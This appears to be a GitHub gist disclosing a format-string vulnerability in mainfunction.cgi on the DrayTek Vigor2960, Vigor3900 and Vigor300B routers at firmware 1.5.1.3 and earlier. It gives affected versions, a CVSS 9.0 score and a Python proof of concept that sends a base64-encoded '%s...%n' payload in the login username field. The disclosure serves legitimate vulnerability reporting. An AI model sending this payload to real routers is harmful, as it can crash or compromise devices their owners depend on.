Cossack9989/draytek-vigor-fsb-vuln.md Secret

## draytek-vigor-fsb-vuln.md

      
    Raw
  

              draytek-vigor-fsb-vuln.md
            
          
    Affected devices

Vigor2960, Vigor3900, Vigor300B
Affected firmware version

<= 1.5.1.3
Founder

C0ss4ck @ Bytedance Wuheng Lab
Submit-time

2021-07-21
CVSS Score

AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H, 9.0
PoC

from base64 import b64encode
import requests

data = {
 "action": "login",
 "formusername": b64encode(b"%s%s%s%s%s%s%s%s%n%n%n%n%n").decode(),
 "formpassword": b64encode(b"12345678").decode(),
 "formcaptcha": b64encode(b"123456").decode(),
 "rtick": "2345678"
}
header = {
 "Content-Type": "application/raw"
}
url = {
 "root": "http://192.168.1.1:80",
 "cgi": {
  "root": "/cgi-bin",
  "uri": {
   "mf": "/mainfunction.cgi",
  }
 }
}

def build_url(p1, p2=None):
 if p2:
  return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
 else:
  return url["root"] + url[p1]


session = requests.session()
r = session.post(build_url("cgi", "mf"), data=data, headers=header)
print(r)

Details


Location: mainfunction.cgi


Fix

DrayTek should publish a new firmware